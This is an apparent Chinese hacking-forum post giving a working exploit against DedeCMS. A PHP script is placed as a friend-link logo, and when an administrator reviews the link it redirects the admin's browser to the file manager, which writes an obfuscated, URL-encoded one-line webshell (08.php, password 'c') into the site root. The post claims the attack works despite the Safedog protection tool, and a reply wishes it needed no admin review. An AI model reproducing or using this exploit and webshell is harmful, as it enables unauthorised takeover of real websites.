先看到WooYun-2014-65561 测试最新版 已经修复了
这个用的是加载js 执行的 还有一种方法
在logo处填写一个我们可控的php脚本 这个php脚本可以是远程的
go.php脚本内容
[PHP] 纯文本查看 复制代码
<?php
if($_SERVER['HTTP_REFERER']){
$baseurl = str_replace('friendlink_main.php','file_manage_control.php',$_SERVER['HTTP_REFERER']);
$baseurl .= '?fmdo=edit&filename=08.php&str=%3c%3f%70%68%70%0a%24%76%6c%6a%3d%22%4e%66%64%22%3b%0a%24%6c%75%20%3d%20%73%74%72%5f%72%65%70%6c%61%63%65%28%22%71%22%2c%22%22%2c%22%71%73%71%74%71%72%71%5f%72%65%71%70%71%6c%61%71%63%71%65%22%29%3b%0a%24%75%6b%74%3d%22%49%22%3b%0a%24%7a%73%3d%22%66%4b%66%54%73%3d%22%3b%0a%24%76%77%6e%3d%22%47%56%32%59%57%77%6f%4a%46%39%51%54%31%4e%55%57%32%22%3b%0a%24%68%79%20%3d%20%24%6c%75%28%22%72%22%2c%20%22%22%2c%20%22%62%72%61%72%73%72%65%72%36%34%72%5f%72%64%72%65%72%63%72%6f%64%72%65%22%29%3b%0a%24%70%70%6c%20%3d%20%24%6c%75%28%22%6f%71%22%2c%22%22%2c%22%6f%71%63%6f%71%72%6f%71%65%6f%71%61%74%6f%71%65%6f%71%5f%6f%71%66%75%6f%71%6e%6f%71%63%74%69%6f%71%6f%6f%71%6e%22%29%3b%0a%24%6a%66%20%3d%20%24%70%70%6c%28%27%27%2c%20%24%68%79%28%24%6c%75%28%22%66%22%2c%20%22%22%2c%20%24%75%6b%74%2e%24%76%77%6e%2e%24%76%6c%6a%2e%24%7a%73%29%29%29%3b%20%24%6a%66%28%29%3b%0a%3f%3e%0a&activepath=';
header("Location:$baseurl");
}
die;
?>
管理审核友情链接
在网站根目录生成08.php 一句话密码c
dedecms 20140814 加网站安全狗测试成功
| 
发表于 2014-11-29 14:28:42
不用管理审核 就更好了 虽说我是小白{:soso_e193:}